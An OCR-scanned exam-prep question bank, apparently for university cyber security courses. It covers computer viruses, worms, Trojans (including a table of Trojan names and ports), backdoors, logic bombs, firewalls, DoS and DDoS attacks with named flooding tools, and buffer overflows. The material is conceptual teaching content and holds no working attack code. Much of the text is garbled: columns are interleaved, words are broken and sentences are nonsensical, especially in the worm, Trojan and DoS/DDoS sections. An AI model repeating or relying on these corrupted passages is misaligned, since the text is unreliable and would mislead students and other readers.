the system. This action could be performed every time the program is invoked, 
orit could be a logic bomb that triggers only under certain conditions. Finally, 
the virus transfers control to the original program. If the infection phase of 
the program is reasonably rapid, a user is unlikely to notice any difference 
between the execution of an infected and uninfected program. 
,., Once a virus has gained entry to a system by infecting a single program, it 
is in a position to infect some or all other executable files on that system when 


the infected Program executes. Thus viral infection can be completely prevented 
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by Preventing the virus fr, 


Prevention is e k 
xtra ordinarily diffi firs 
outsi y difficult Me first place 
outside a system. Thus, unl ; because a virus, can bes: forty 
art ofa Mately 


Ans Refer to Q.7 and Q.10. (R.GPY, Nov, di 


Q.12. Explain various types of viruses. (R. GP y, 
URS June 2019 
) 


i Or 
Briefly describe the types of viruses. (R.GP. 
Or "GP E, Dec, 2012) 


Classify the different categories of viruses. (R.GP, p, 
EUIS Dec. 2016) 


Ans. The following categori i 
dius siue beens ia ame as being among the most Significant types 
(i) Stealth Virus — A f i ici i 
from detection by antivirus ia mi oe serena 
compression so that the infected program is essi de ee ieee 
uninfected version. Far more sophisticated techniques are ae oem 
ie wap br d oe logic in disk vO routines, so that when 
Wevinrdn secus back te l ee of the disk using these routines, 
AO aE dis eph Bc DA ginal, uninfected program. Thus, stealth is 
c : irus as such but, rather, is a technique used by a 
virus to evade detection. 

. (ii) Polymorphic Virus — A virus that mutates with every infection, 
making detection by the "signature" of the virus impossible. This virus creates 
copies during replication that are functionally equivalent but have distinctly 
different bit patterns. As with a stealth virus, the purpose is to defeat programs 
that scan for viruses. In this case, the "signature" of the virus will vary with 
each copy. To achieve this variation, the virus may randomly insert superfluous 
instructions or interchange the order of independent instructions. Amore effective 
approach is to use encryption. A portion of the virus, generally called a mutation 
engine, creates a random encryption key to encrypt the remainder of the virus. 
The key is stored with the virus, and the mutation engine itself is altered. bus 
an infected program is invoked, the virus uses the stored random key to dectyP 


ihe virus. When the virus replicates, a different random key is selected. 
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f 
jonal and still most common ded 
cutable files and replicates, when 


ther executable files to infect. 


Lodges in main memory as part ofa 
on, the virus infects every program 


us — The tradit 


em pro! 
Virus — |nfects a master boot record or boot recor 
tem is booted from the disk containing the virus. 
yste ) 
es of viruses. 


? Explain different YP R GBV, Dec. 2013) 


and Q.12. 


s ? What is virus structure ? Explain the types of 


4, What is viru (R.GPV., June 2012) 
viruses 

Ans. Refer t0 Q.7, Q.10 and Q.12. 

" age? 
0.15. What are the two phases of execution of a virus : ^ 
Mi ; i tion — the infection 

Ans. Viruses potentially have two phases to their executio 
phase, and the attack phase. . . 

Infection Phase — When a virus executes it ha 
another program. When it would infect other program Is € 
Some viruses infect each time they are executed; othe! i 
when triggered. This trigger could be anything; a day or time, an external 
event, a counter within the virus, and so forth. Virus writers want their programs 
to spread as far as possible before they are detected. 

Many viruses go resident in the same or similar manner as Terminate and 
Stay Resident (TSR) programs. This means, the virus waits for an external 
event before infecting additional programs. A virus may silently lurk in memory 
waiting for a user to access a diskette, copy a file, or execute a program, 
before it begins infecting. This makes viruses difficult to analyze, because it is 
hard to determine the trigger condition. 

i per Phase — Just as the infection phase can be triggered by an event, 
h ck Phase also has its own trigger. Not all viruses’ attack, but all of 
them do use system reso a abis: 

These b urces, and frequently contain bugs. 

ese bugs cai i Ps Pe : 
often delays = ser p en negative side effects. In addition, viruses 
have had ample o = eir presence by launching an attack only after they 
for days, weeks ppo : oe to spread. This means an attack could be delayed 

iii. dade vU DAMM 

€ 1s optional; i " 
condi ptional; many viruses reproduce without a trigger 


ition. Howeve, i i 
ver, anything that writes itself to a disk without permission is 


s the potential to infect 
learly not understood. 
r viruses infect only 


BD — 
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stealing storage and CPU cycles. Viruses that “only infect” 
Phase often damage programs or disks. This is not an intern; 
virus, but simply the result of poorly written code, 


, With no 
‘ational act "i 


Q.16. What is virus ? How it works ? Explain its phases of executi 
(R.GPY,, Deo 5°" 


7 ee, 2015) 
Ans. Refer to Q.7, Q.10 and Q.15. 


Q.17. What are the different ways to infect computer Systems thy, 
viruses ? ough 
Ans. There are following ways viruses infect com 
(i) Boot Sector Penetration — 
sector on every disk. In a boot disk, the se 
powers up a computer. In a non-bootabl 
allocation table (FAT), which is automaticall 


puter systems — 


first 
that 
file 


(ii) Macros Penetration — Because macros are small language 


imbedding themselves into surrogate 
ctive. The rising popularity in the use 


ng in micro virus penetration as one of 
n. 


of script in web programming is resulti 
the fastest forms of virus transmissio 


(iii) Parasites — These are viruses that attach themselves to a healthy 


executable programs and wait for any event where such a programs is executed. 


Nowadays, due to the spread of the Internet, this method of penetration is the 
most widely used and the mo: 


st effective. Examples of parasite virus include 
Friday the 13th, Michelangelo, SoBig, and the Blaster viruses. 


0.18. Discuss digital immune system. (R.GP.V., Dec. 2009, 2012) 


Ans. The digital immune System is a comprehensive way to virus protection 
loped by IBM. The motivation for this development has been the rising 
at of Internet-based virus propagation. 


In response to the threat posed by these Internet-based capabilities, IBM 
developed a prototype digital immune system. The objective of this system 
is to provide rapid response time so that viruses can be Stamped out as soon as 
they are introduced. When a new virus enters an organization, the immune 
System automatically captures it, analyzes it, adds detection and shielding for 
it, removes it, and passes information about that virus to systems running 
IBM AntiVirus so that it can be detected before it is permitted to run elsewhere. 


deve 
thre; 


has 
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=N A Virus Infected 

n we = | Client Machine 

A Administrative 
Machine 


Private 
Network 


lyze Virus 
behaviour and 
Structure 


Client 
Machine 


Client 
Machine 


Extract 
Signature 


Derive 
Prescription 


Administrative 
Machine 


pie 


Network 


Individual 
User 


Fig. 5.2 Digital Immune System 
The steps in digital immune system operation are shown in fig. 5.2 — 
(i) A monitoring program on each PC uses a number of heuristics 
on the basis of system behaviour, suspicious changes to programs, or family 


signature to infer that a virus may be present. A copy of any program thought 


to be infected is sent by the monitoring program to an administrative machine 
within the organization. 


(ii) The administrative machine encrypts the sample and sends it to 
a central virus analysis machine. 


(iii) This machine creates an environment in which the infected 
Program can be safely run for analysis.The techniques used for this purpose 
are emulation, or the creation of a protected environment within which the 
Suspected program can be executed and monitored. Then, the virus analysis 
machine produces a Prescription for identifying and removing the virus. 


(iv) The resulting prescription is sent back to the administrative machine. 


i (V) The administrative machine sends the prescription to the infected 
client. 


(vi) The Prescription is also sent to other clients in the organization. 


(vii) Subscribers around the world get regular antivirus updates that 
Protect them from the new virus. 


-19. What i irus ? the virus spread ? How to protect 
€ ur "QNI nee AOE (R.GP.V., Nov. 2018) 


Ans. Computer Virus — Refer to Q.7. 


Spreading of Virus — Refer to Q.10. 


Protection Against Virus — Refer to Q.18 


p — 
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Q.20. Define worm. 


Or 

Write short note on worm. 
Ans. A worm is sometimes con 
similarities, the worm is code. How 


Tus. The h 
does not modify other progra: 


ever, it is an independ, ave Som 
b ent e 
ms, but reproduces itself Over ang Eram that 


until it slows down or shuts down a computer system or 4 des Over again 
ork, 
Q.21. Define the worm Propagation model, (R.GPy 
Ans. Refer to Q.20. ` 


worm. t schemes 
Q.22. Describe three Phases of worm Propagation. (R.GP. y. June 2 
WEE, Jun 
Ans. There are three phase of worm Propagation — Target f e e 2017) 
transferring and infection. Bet finding, worm 


Target Finding — 
different spaces. 
There are four classes in which worms finds 


(i) Internet Worms — 
address space. 


(ti) P2P Worms — 


In target finding phase, worms determine the target in 


the target on the bases of space- 
Internet worms search the target in the IP 


P2P worms search the target in the P2P networks 
space. 


(iii) E-mail Worms — E- 


mail worms search the target in the email 
address space. 


(iv) Instant Messaging (IM) Worms — 


. IM worms search the target 
in the IM user IDs space. 


Above classification is not strict. Many worms can use two or more 


classes. For example, the Nimda worm is an e-mail and internet worm. Bibrog 
1s a email and P2P worm. 


Worm Transferring and Infection — Worm transfer and infection can 
be done manually or automatically. From high to low, human intervention 
degrees can be of four types — manual transfer and manual infection, manual 
transfer and automatic infection, automatic transfer and manual infection, and 
automatic transfer and automatic infection. 

Fig. 5.3 shows the four worm classes of human intervention scia 
Internet worms use automatic tranferring and automatic infection via ra ale 
exploitation in which the worms code can be transferred and sa gat tes 
any human efforts. IM worms and e-mail worms uses de = Semen 
and manual infection or manual transferring and automatic In b 
all four human intervention degrees. 


47. 
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Space of P2P Worm 
pP network 


neighbors 


Space of 


A IM users 
? Space of 
3 IP 
g 
z Addresses 
Ë | space of E-mail Worm 
É| Email 
Address 
Manual Manual Automatic Automatic 
Transfer & Transfer & Transfer & Transfer & 


Manual Infection Automatic Infection Manual Infection Automatic Infection 


High Human Intervention Low Human Intervention 


Fig. 5.3 Four Worm Classes 


Q.23. What is the difference between viruses and worms ? 


Ans. A virus and a worm are similar in that they’re both forms of malicious 
software (malware). A virus infects another executable and uses this carrier 
program to spread itself. The virus code is injected into the previously benign 
program and is spread when the program is run. Examples of virus carrier 


programs are macros, games, e-mail attachments, Visual Basic scripts, games, 
and animations. 


A worm is a type of virus, but it’s self-replicating. A worm spreads from 
system to system automatically, but a virus needs another program in order to 


Spread. Viruses and worms both execute without the knowledge or desire of 
the end user. 


0.24. Discuss the characteristics of a worm. 
Ans. The various features of worms are as follows — 


(Ù) Enhanced Targeting — The most important attribute of a worm 
Spreads its infection to other computers. But how does a worm know 
arget next ? . 

Many target selection strategies have been proposed and implemented. 
orms that Spread through e-mail, for example, have an casy way to figure 
Out their targets. All they need to do is look into their victim’s mailbox or e- 
ail address book to find a set of targets. A mobile worm obtains phone 
numbers of its potential victims from the phone book in the cellphone hosting 
the worm, Some web worms use search engines to harvest URLs of potentially 

Vulnerable targets. 


is that it 
Who to t 


y 7 


100 Cyber Security 


Internet scanning worms, on the 
for vulnerable machines. The most Straightforward the 1p a 
scanning — choosing IP addresses at random. This Was 
Version-l. However, Code Red V, 


is 
A S ado a 
ersion-lI adopted locali Pted byc 

80% of the time, it attempted to connect to Victims wi 


network address (most Significant 8 or 16 bits oft 
was more successful since hosts in 


and be running the same Software, 


other hand, Scan the 


enterprise. Once inside, it ex 


Penetrating th 
within the enterprise, 


ploited the Windows fj ae Perime i 


ome other spreading method, 
(iii) Enhanced Capabilities — M, 


, there are 
es to evade detection. One such tec! 
disguising worm code. Different instance 
keys for encryption. Thus, the 
signatures. Such worms are said 


Some worms need to be time-aware. They obtain the current date and time 


from a network time protocol (NTP) server and can initiate specific actions at 
specified points of time. This capability allows worms to remain dormant for 
extended periods of time and then strike in a concerted fashion by, for example, 


ee 
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k at the same time. Some worms can update 
e ree given URLs. Alternatively, they may access 
e 


nial of servic 


ing 4 Cot r 
T by pense a set of URLs from which updated worm code 
hems?” hich in turn P 


UR. dow 3 
may d infection 
: o SMTP eng" d Destructive Power — \t is estimated that worms such 
» (iv) peat caused billions of dollars in damage. How are these 
as code Red and pent estimate costs based on lost productivity, clean-up 
osts estimated ? downtime which affects business and revenues. Fast- 
orgs, and system Iso caused severe network congestion problems disrupting 
preading iiie and contributing to system down-time. l 
normal Interne most worms thus far have been relatively benign. Some 
Neen d attack packets to a DDoS attack or caused Website 
worms contribu = worm which appeared in March 2004, however, was 
defacemen eent. It was the first worm to carry a destructive payload. It 
qualitatively domi section of the victim’s hard disk leading to a system crash. 
dard to imagine worms carrying for more destructive payloads that 
could crash many more systems. T 
The harm caused by a worm is not just destructive power measure g 
downtime, lost productivity, and system crashes. There are more sinister an 


subtle goals such as the stealing of sensitive personal and corporate information, 
which could remain undetected. 


‘nally, early e-mail worms used the host's e-mail services 
nloaded. zs aie more recent worms have been designed with a 
ile 
E which they use to send mail. 


costs, 


.25. What are the typical phases of operation of a virus or worm ? 
Es = (R.GP.V., Dec. 2017) 


Ans, During its operation, a typical virus goes through the following four 


phases — 


() Dormant Phase — The virus is idle. The virus will eventually be 
activated by some event, such as a date, the presence of another program or file, 
or the capacity of the disk exceeding some limit. Not all viruses have - — 

ii ation Phase — The virus places an identical copy o 
iki e or into certain system areas on the disk. Each infected 
Program will now contain a clone of the virus, which will itself enter a 
Propagation phase. 

(iii) Triggering Phase — The virus is activated to perform the function 
for which it was intended. As with the dormant phase, the triggering phase 
can be caused by a variety of system events, including à count of the number 
9f times that this copy of the virus has made copies of itself. 

(iv) Execution Phase — The function is performed. The function 
may be harmless, such as à message on the screen, or damaging, 
destruction of programs and data files. 


Such as the 
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A network worm e 
a dormant Phase, a pro 


xhibits the same characteristics as a 
phase. The propagation 


pagation phase, a triggering phase 
phase generally performs the 
(i) Search for other Systems to infect bye 
similar repositories of remote system addresses, 
(i) Establish a connection with a 

(iii) Copy itself to the remote 

The network worm may also attem; 
Previously been infected before copyin, 
gramming system, it may also disguise i 
Process or using some other name that 
As with viruses, network worms 
network security and single- 
and implemented minimize t 


followin, n2 
Xamining host aCe, 2 il 
remote system, 
System and Cause the Co 

pt to determine Whe zb 
B itself to the y: 
ts presence by na 
may not be noticeq t a Sys 
are difficult to 
System security measu 
he threat of worms 


counter, H alor 


Weve 
Tes, if pro 


T, both 

Perly desit 
Q.26. Write short note on T; rojan horse, (R.G p V, June 2008, 
Or > 


Dec, 201 5) 
Write short note on Trojans. 


BackOrifice 
Deep Throat 
Net Bus 
Whack-a-mole 


31337 or 31338 
2140 and 3150 
12345 and 12346 


12361 and 12362 
20034 

21544 

3129, 40421, 40422, 
40423 and 40426 


on the backs of other programs and are usually mee 
‘ À : im 
a system without the user's knowledge. A Trojan can be sent to a vic 


ue oFw"wgs gc 


NetBus 2 
GirlFriend 
Masters Paradise 


Trojans ride 


-N 
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stant Messenger (IM) attachment, IRC an 
n 


; ams supporting 
g= ing. Many take progr: 
Qe ner NerBIOS n. spyware removal tools, system 
1 ne = i install a 
al ste software ae pictures, games and videos can ins 
ip We lE creen SAVE io ownloaded. 
3 ine sm just by being d 
o. onas . > 
qma? ? How does a Trojan work - 
0' 
sil computer system/network ? 
How Trojan horses affect the comp (R.GP.V., Nov. 2018) 
o 


in two parts, a Client part and a Server part. When the 
ns. Trojans Sas sp machine, the attacker will then use the Client to 
i n > : z 
;« runs the isin start using the Trojan. TCP/IP protocol is the usual 
the pile communications, but some functions of the Trojans 
deca ol as well. When the Server is being run on the victim s 
DP Paali) try to hide somewhere on the computer, start listening 
de incoming connections from the attacker, modify the registry 
s . 
some other auto starting method. o ; 
Ligen ary for the attacker to know the victim's IP address to connec 
1 eru Many Trojans have features like mailing the victim's IP, as 
: ants the attacker via ICQ or IRC. This is used when the iki 
saponins IP which means every time you connect to the Internet you g 
a different IP (most of the dial-up users have this). : m 
i 1 en you 
Most of the Trojans use Auto-Starting methods so even w! md da 
our computer they're able to restart and again give the attac cer a 
ES s machine. New auto-starting methods and other tricks are ideis 
ide an “joining” jan i e executable 
all the time. The variety starts from “joining” the Trojan into som sir 
file you use very often like explorer.exe, for example, and y^ x Satu 
ifvi i stry. 
methods like modifying the system files or the Windows Regi 
files are located in the Windows directory. 


Q.28. List the different types of Trojans. 
i t attacks. Some 
Ans. Trojans can be created and used to perform different a 
of the most common types of Trojans are — i 
" mote access to 
(i) Remote Access Trojans (RATS) — Used to gain re 
a System. 
is (ii) Data-sending Trojans — Used to find data on a system and 
nidis dent or | Trojans — Used to delete or corrupt files on a system. 
" Eun Trojans — Used to launch a denial or service 
iv) Denia 
attack, 
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(v) Proxy Trojans — This is a type of tro; 
the victim's computer as a prox: Tse 


an ] 

y Server. This gives the s Red ty 
to do everything from your computer, including the Possibile an CN Use A Data 
credit card fraud and other illegal activities, or even to ity Of co i nity Alicia — R/W 
launch malicious attacks against other networks. "86 Your g tent Boby- W 

(vi) FTP Trojans — Allows the attacker 10 Use to 

computer as an FTP server. Installing this Trojan onto 
enable the intruder to download/upload 


files from his 
could provide another avenue more installation of malw; 


(vii) Security Software Disabler Trojans Used 
0-29. Differentiate between Proxy Trojans and 


Back-pocket 
iU File 
One eL. 
Our Compr, else 


e. "© Yours, Which 
‘stop antivinas 
FTP Trojans, 
Ans. Refer to Q.28 (v) and (vi). RGRy, Dec, 2016) 


Software 


2.30. In what ways a system can be defended from Trojan horse atta k 
ck? 


ig. amed Boby 
le containing the critically sensitive 


is created by Boby with read/write 

s own behalf only, 
When a hostile user Alicia, gets legitimate access to the system and installs 
both a Trojan horse program and a private file to be used in the attack as a 
‘back pocket’, Alicia gives only write permission to Boby and Read/Write 
permission to herself, as shown in fig. 5.4 (a). Now advertising it as useful 
utility, Alicia induces Boby to invoke the Trojan horse program. When it is 
detected that program is executed by Boby, it reads the sensitive character 
string from Boby’s file and Copies it into Alicia’s back-pocket file as shown in 
fig. 5.4 (b). 


(d) 

EN Fig. 5.4 Trojan Horse Defense 
: ting system. The 
as shown in fig. 5.4 (c), consider a secure operating sys chtas 
bet ae assigned seu levels at Togon, on the mr er 
the terminal from which the computer is being accessed a lvo cecinit levels 
identified by password/ID. In fig. 5.4 (c), there are two securi than 
“ Mee HR blic, ordered in such a way that sensitive is higher an 
viz., sensitive and put Sposi level processes owned by Boby and Boby's 
ag ae = d Alicia's file and processes are restricted to public. 

ata file are ass d 


(a) 


y — 
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Now ifa Trojan horse program is invoked by Boby [ 
then the program acquires Boby’s security level. So it is able to a. (a) 
sensitive character string, under the simple security pro Obse : 
attempts to store the string in a public file (the back-p 
*-property is violated and the attempt is disallowed 
Hence, the attempt to write into the back-pocket fi 
access control list permits it. Hence, the securi 
over the access control list mechanism and thu 
attack is defended. 


by the reference mm. 
le is denied even hig 
ty Policy takes bcn the 
S System from Troja ence 


Q.31. Write short note on backdoors, 


T retain access 


to a machi 
been detected a 


and remedied 


or completely disabled. 


This technique is effective because when a hacking attempt occurs the 
system administrator usually focuses on looking for something odd in the 
system, leaving all existing services unchecked. The backdoor technique is 
simple but efficient. The hacker can get back into the machine with the least 


amount of visibility in the server logs. In most cases, the backdoored services 
lets the hacker on higher privileges. 


Remote Administration Trojans (RATS) are a class of backdoors used to 
enable remote control over a compromised machine. They provide apparently 
useful functions to the user, and at the same time, open a network port on the 
victim computer. Once the RAT is started, it behaves as an executable file, 
interacting with certain registry keys responsible for starting processes and 
sometimes creating its own system services. Unlike common backdoors, RATs 
hook themselves into the victim’s operating system and always come packaged 
with two files — the client file and the server file. The server is installed in > 
infected machine, and the client is used by the intruder to control the 
compromised system. 
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>V., Nov. 2019) 
rt note on logic bomb. (R.GP. 


xus í 

m, or portion of a program, which lies es 
dogs is activated. In this way, a logic ie 

| specifie piece dun land mine. The most common activator » a 

"H à i 

, ogs io panier bomb checks the system date ya y a 
B j ; ; 

isa ia date and time is reached. At that point, t : en : 

ape its code. The most dangerous form of the logic i 

vates and executes its when something doesn't happen. Because a josic 

p bomb that Ae ale it is very easy to write a logic bomb Program. 

fames s Tata Togi bo b will not spread to unintended victims. In 
;; also means that a logic boml | no as 

This ways, à logic bomb is the most civilized programme 

pe bomb must be largeted against a specific victim. 


, Write short ! 
pA logic bomb is a pro 


Q.33. Write short note on firewalls. l (R.GP.V., Nov: 201 9) 

Ans. Conceptually, a firewall can be compared with a sentry standing outside 
an important person’s house i.e., such as the nation’s president. This sentry 
keeps an eye on and physically checks every person that enters into or com 
out of the house. If the sentry senses that a person wishing to enter the president s 
house is carrying a knife, the sentry would not allow the person to enter. Similarly, 
even if the person does not possess any restricted objects, but somehow looks 
suspicious, the sentry can prevent that person’s entry. 


A firewall acts like a sentry. If implemented, it guards a corporate network 
by standing between the network and the outside world. All traffic between 
the network and the Internet in either direction must pass through the firewall. 


To | 


Network Backbone 


Firewall 


Fig. 5.5 A Firewall 
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Of course, technically, a firewall is a Specialized Versio 
addition to the basic routing functions and Tules, a router a rout, l 
to perform the firewall functionality, with the help of da Configured 
resources. "Moral Software 
The characteristics of a 


good firewall implementati 
as follows — €— - 


Scribe, d 
(i) All traffic from inside to Outside, and Vice ver, 
through the firewall. This can be achieved if all the access to ier must Pass 
must first be physically blocked and access only through the fi ocal network 
be permitted. Tewall sh 


Ould 
(ii) Only the traffic au 
be allowed to pass through. 


(iii) The firewall itself 
attacks on it useless. 


thorized by the local Security Policy gh l 
Ould 

must be strong enough, so that to Tend 
er 


DoS AND DDoS ATTACKS, BU 


FFER OVERFLO 
WIRELESS NETWORKS, 


W, ATTA 
PHISHING ~ METHOD or ON 
PHISHING, PHISHING TECHNIQUES 


€ of attackers for carrying 
hey want to slow down a 
etely for creating problems 
nly focus on the computers 


out these types of attacks, is not definite. Either t 
network or they want to destroy the network compl 
to users. The attackers in this type of attack mai 
which are connected to the Internet. 

The messages were sent repeatedly to the victim machine in earliest type 
of DoS attacks. Since most machines at that time had resources that could be 
depleted easily, so machines were vulnerable to these attacks. It was common 
for the attacker 


to send mails or malicious packets from fake source addresses 
So that they cannot be caught. So these attackers and packets were difficult to 
recognize from malicious machines, to fi 


Iter them at a firewall. 
Now attackers are focusing on websites or services which are hosted on 
a high-profile web servers like online shopping sites, bank, online and debit 
card paymet systems etc. To apply this type of attack, buffer overflow technique 


, 4JÀ 


i 
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known as spoofing. In buffer overflow technique the 
o f victim’s machine with continuous request, Since 
is a fills the Lee attacker is fake so the victim’s machine wait to 
a oofing the IP ad ru The bandwidth of the network then consumed and 
apne the requests which are not fake and the network 
finally breaks nus signs of DoS attacks which was given by the United 
ahi Emergency Response Team — 
States Compu he users try to open a file or access a website then it takes 
© Y Touli take. It means that the performance of network is slow. 
more oe hen we want to access a website and the website is unavailable. 
(iii) When the users get unexpected e-mails or spams then it is also 
significance of DoS attack. 


which is als 


0.35. Briefly discuss the various types of DoS attacks. 
Ans. Some of the DoS attacks are as follows — 


(i) IP Spoofing — IP spoofing is forging of an IP packet address. 
In particular, æ source address in the IP packet is forged. Since network 
routers use packet destination address to route packets in the network, the 
only time a source address is used is by the destination host to respond back 
to the source host. So forging the source IP address causes the responses to 


be misdirected, thus creating problems in the network. Many network attacks 
are a result of IP spoofing. 


(ii) Smurf Attack — In this attack, the intruder sends a large number 
of spoofed ICMP Echo requests to broadcast IP addresses. Hosts on the 
broadcast multicast IP network, say, respond to these bogus requests with 


reply ICMP Echo. This may significantly multiply the reply ICMP Echos to 
the hosts with spoofed addresses. 


(iii) Buffer Overflow Attack — In this attack, the attacker floods a 
carefully chosen field such as an address field with more characters than it 
can accomodate. These excessive characters, in malicious cases, are actually 
executable code, which the attacker can execute to cause havoc in the System, 
effectively giving the attacker control of the system. Since anyone with little 
knowledge of the system can use this type of attack, buffer overflow has 

€come one of the most serious classes of security threats. 


(iv) Ping of Death Attack — This vulnerability is used to hang remote 
Systems so that no user could use its services. A system attacker sends IP 
Packets that are larger than the 65,536 bytes allowed by the IP protocol. 
Many operating systems, including network sien Systems, cannot handle 
these oversized packets, so they freeze and eventually crash, 


yp aN 
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sed for DoS attack. 
(v) Teardrop Attack — The tea 


ious tools u: that a victim’s 
: "drop attack Uses 7. Discuss e uinea that use different s Rage us there are 
causes fragmentation of a TCP packet. It exploits a Teasse p D'ogram tha "7 There are e But the motive of attac er is 2 Pis iesus 
the victim system to crash or hang. mbly ang caus. An be Tardar by attacker, which are waiting 
s S| 
(vi) SYN Attack — The 


SYN attack exploits T. 
-way handshake, the Ee 


ca 
compute ber of reque 
z S thr 
: Client Send: PO-Way 
o this packet with a S AN 


n tem 
lage s on SYS! 
the service attacker does no 


handshake. In a normal three. 


Il the system is unavailable to user. Although in DoS 
ora 
to the host, the host replies t 


t want to access the system or network so it is an 
wi 


cil k of last resort. Here the 
YN ACK ket pecket attack, UE ated attack, therefore It ees bac the victim's machine. 
client responds with a TCP ACK (acknowledgement), Packet, Then the unsophistm. harms the victim s int launch the DoS attack — 

Now, in a SYN attack too, several SYN packets are Sent to th ae tools are given a ae olima DS aas li 
all these SYN packets have a bad source IP address. When the P Server but So (i) Targa — Targa HS iini DoS attacks. Using this tool the attackers 
receives these SYN packets with bad IP addresses, it tries to "a Bet systems able of running eight wine 
one of them with a SYN ACK packet. Now, the target s Pond to each is cap 


h an individual attack or any set of attacks until it get nicis 
ACK are capable tO fos — By using this tool, the attackers are enabled to generate 
hese Tequests unti (ii) Ne 


ackets of spoofed address, : on window’s based 
the remote target System gets an ACK message. Hence, i hen until randon * it Jolt2 — This type of eo ee nu based machines 
or occupy valuable resources of the target machine, take up networking code. This tool cane nsumption of CPU time on processing of 
To actually effect the target system, a large number Of SYN bad Ip ack and this attack causes the 
have to be sent. Since these packets have a bad source IP, they queue up ^" illegal packet. Trouble — This tool is also a remote tool. It floods the 
up resources and memory or the target system and eventually crash, hang E (Some 
reboot the system. 


i te bomber. 
is is called remote flooder or remo! > 
Mes pcm Pinger — If an attacker is targetting the whole wem 
then this KA can be used. Using this tool attacker is enable to send larg 
n 
Siekes of ICMP to a remotely targetted network. 


0.38. How can the DoS attacks be prevented ? 


A land attack is same as a 


SYN attack, the onl 
instead of a bad IP address, the 


y difference being that 
IP address of the target system is used. 
(vii) SYN Flooding — A three. 
protocols to initiate a connection betwee: 


-way handshake used by the TCP 
handshake, the port door is left half ope 


n two network elements. During the 


Ans. There are many preventing measures of DoS attacks, some of them 
n. A SYN flooding attack is flooding are as follows — : ime. It will reduce 
the target system with so many connection requests coming from the spoofed (i) Router filters should be implemented time-to-time. 
Source addresses that the victim server cannot complete because of the bogus the risk of certain DoS attacks. 
Source addresses. In the process all its 


z i tivities. This 
memory gets hogged up and the victim (ii) A baseline should be established for ordinary ac 
s and can be brought down. | 


is thus overwhelmed by these request: 


, rmance, disk usage, CPU 
baseline should be used to observe system's perfoi 
(viii) Sequence Number Sniffing — In this attack, the intruder takes usage or opi a ds, we should check our physical security 
advantage of the predictability of sequence numbers used in TCP — Sie bie ak 
nn The attacker then uses a sniffed text sequence number to (iv) We should install a irren Pena iiie miman 
esmosi legitimacy, (v) Regular backup sc ; ivileged accounts like Unix 
A hi ly privi lege E 
Q.36. What are DoS attacks ? Discuss any three classified DoS attacks (vi) Password policies Eel should be established and 
in brief. (R.GP. V, Dec. 2010, June 2011) Toot and Microsoft Windows N 
Or maintained properly. ed and unessential services on our System, 
a s : 
What do you mean by denial of service ? Write various denial of service A" D oats and ae advantage of these services to execute DoS, 
e 
attacks. Explain any two. (R.GPV., Dec. 2013) which cause 


Aus. DoS Attacks — Refer to Q.34. 


then should uninstall that services. 
Types of DoS Attacks — Refer to Q.35. 


(viii) Patches can be installe 


dm D wu 


d to avoid TCP SYN flooding. 
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0.39. What are DDoS attacks ? Explai; i 
DDoS attack, ints Also dis 
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e inst DDoS 
ibe the 3 lines of defence against 
oS ? Describ ( 


R.GP.V., Dec. 2012) 
is DD 
USS the tools , " what HA 
Ans. DDoS is also known as distributed denial of sery; Sed i, P^ pos Refer to ee Three lines of defence aga 

type of attack an attacker may use one computer to attack o, Ice attack In thi a Ans: p against pDoS de 
An attacker can take control of your Computer by using s another Computes | pefene fetlows = : n and Prevention (Before the cae 
9r security weaknesses of System. Now once taking co, Tabilic T ps are 95 ck Prevention = Pack attempts without denying 
he/she enforce the computer to Send a vast amount of ntro] Om es (tac i) Atta ictim to endur 
a website. Since the attacker is using i 


; icies for resource 

o hniques include enforcing npe dissi 

isms Techn required. > 
nts. rces as 

jimate clie backup resou! 


: inimize the 
m idin Internet to minimize 
. yo legit tion and providing d protocols on the 
ni 


4 s an 
synchronized fo ‘ onsump modify system: 

Cks are applied ig Called “ i Attacking on mechanisms OS attacks. 
stems which are attackin, are known as “seton MANY victim» o 

al of service attack mechanis; 


. — These 

. ing (During the Attack) 3 
ces Detection and filtering ( nd immediately. This 

P^ | demo asc tarts and respo i 

: ™ is launche bs aD ^ to find the attack as s Detection involves looking for 

and time. DDoS attack mechanism can also be applied by malware ri dat chanisms tries f the attack on the target. De 

is the example of this. Prior to release of the malware the ` res rn 

includes hardcoding the data forget, therefore to launch 

instruction is need 


m i Itering out packets likely 
of behaviour. Response involves filtering 

the atta E attacks suspicious patterns 

CK no furthe 


attacks. ification (During and After 
Ombie agent, wh to be part of poses Source Traceback and entific i pé ii id 
ack te je This is an attempt to a es not yield nas 
any e future attacks. Although, this m 
P ting 
step in preven 


YN i iti ngoing attack. 
if at all, to mitigate an o l 
rk (TFN) — Tribe flood network į t fast enough, E | 
Which includes the set of programs to launch different DDos attacks a 0.43. What do you mean by ff : sa iter d 
"T oe T erp eine prse in buffer overflow. In this attack the 
(ii) Stacheldraht — Yt acts as DDoS agent and is fedus | ae aon of a pogam, ii kag 
for linux and solaris operating system. wr 


(iii) Trinoo — Trinoo Systems are bel 
systems on the Internet th 


exploit. It is a set of co 


ich may contain other 
djacent memory is overwritten by the extra € dl ou The result 
p : gram vari and program tow con cess 
p que quem be E behaviour, including memory a 
of data overflow 


ieved to be set on thousands of 


at have been compromised by remote buffer overrun 


mputer programs. 


ination etc. . 
errors, incorrect results, oe sed d a code or altering due vica bn 
. : he i designed to fer overflow 
(iv) Shaft — In this tool client controls the size of flooding packets The inputs pines the buffer overflow. Buffe 
and duration of the attack, though it is packet flooding attack. It is conceptually program operates, 
like a Trinoo. 


3 . , ith 
prevented by bounds checking. ` which eiim ia 
++ are common programming tion against overwril 

(v) MStream — In this tool communication is performed through iuis codice there is no built-in n ere is no automatic check 

TCP and UDP packets. Spoofed TCP packet with ACK flag set to attack the in any part of memory or accessing -— within the boundaries of that aray, 

target are used in this tool. Here packet handler accessing is password protected. vies tl that the data written to an yi in a buffer than it can hold, by a 

This tool has a unique feature eran s ee Nt When it is tried to store more 

users of access successful or not, to the er(s) are inform . 


i ffers can contain 
curs. Since bu 
overflow 06 to go somewhere — can 
program or process, then ees data — which meet is the valid data held 
Q.40. Write short note on DDoS. (R.GPYV, Dec. 2011) limited amount of n en corrupting oe urity attack on data integrity, 
! oe i 
Ans. Refer to Q.39. Ji leer mici isa common devel computer e pe 
i o! ; f process memory layou 
41. DoS and DDoS attacks can be performed ? knowledge sic knowledge of 
as iU 
Ans. DoS Attack — Refer to Q.34. > 
DDoS Attack — Refer to Q.39. 


: tom: 
SES is no au 
is important, There ME 
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write a buffer like — Heap buffer overflow may be 


. : Overflow — pe ; 
void main( ) iii) Hep EE aon programmer and it is occurred in the 


ies more data into a buffer than the 


: ident pes 
int a[20]; . «oduced ace an application cop : 
